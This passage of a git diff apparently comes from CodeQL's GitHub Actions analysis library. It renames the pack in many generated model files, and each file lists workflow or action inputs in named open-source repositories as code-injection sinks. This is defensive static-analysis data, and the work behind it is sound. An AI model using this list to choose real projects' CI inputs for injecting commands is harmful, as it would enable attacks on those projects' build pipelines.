pack: codeql/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index dfa20e1f9d74..8b529012be2b 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 144c4e456dc1..defeb5f7974f 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 51348fb1b565..7eba6fb3b004 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c3fa787b2887..fc8085843ddc 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 9845c089b322..2d831ccbcedf 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 2986040e8cd6..b8892f32d7fe 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 7dafcd5b71bc..3809c827dda9 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 1b5fb0e1d970..88f4246b1623 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 28ec54f1d9dd..35d394a116fc 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 21f35339952a..234ed7fef076 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 594b0cc9bb99..e9ad23c8331e 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index a2fbd510bb29..49ac7d2bf717 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 927cbd449e35..99041db6e26d 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 52037a671cf1..dd132b20a05b 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index b71a87193b68..e87804d0cf85 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 24361a7d29eb..0927d449d371 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index be71c38f1242..a98bbaed725a 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 889edaac1bba..0beb8e432fe6 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index b2b970152de6..0d0f030c6233 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index f885a44f46e6..3574c02b4ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 10f06693d26a..1ce82c53df5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 43d0fe1c2ce6..f2eec6681d3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 4fb13f0a18cc..a4a008154f56 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 96b73aa06de6..d85bd42f7a43 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 554974bfe6f5..391b22d88672 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index f1c6ec345d19..962623cd9133 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 2cfa8a46c83e..99ce22f3f64f 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 8c3c5a585028..e52acbad13ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index aa75ce39295d..989f9aae9376 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index e9dd33c6f175..e34a4b3910b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index a0bd22ad352e..9a1991ddc814 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index fb98c6a7d9b8..0316d82a5e3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 0c108422a94e..16d8ba2b9267 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index c820724bd71e..1a59c9bf160b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 51d32bde4ba7..fb13f2451d9d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index b747a4a27df1..ac92d435f745 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index c5c26bc7926f..278801efa2d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 62a1a853937d..f426656c0769 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index b6c0c1b5e644..17d1c687f62c 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 005db8e9ddce..4a8e4cc4378e 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index a1090c45ae08..803335289524 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 051aacfeee04..b1a056e28364 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 1fb380a3a725..906eb810c89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index a8b8234e1fc5..75469b1a80a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 108bbad1c072..192f1d690b5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 42ed67f3d208..d8f7648e808f 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index a664d6063e30..9789709eac7e 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6270ab5842ee..60e388c076bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 0c4d975e0129..2cdfb52d976f 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 64fc3792659c..1aae8bd0fd4d 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index f48be6693d06..c157f1bbca13 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ 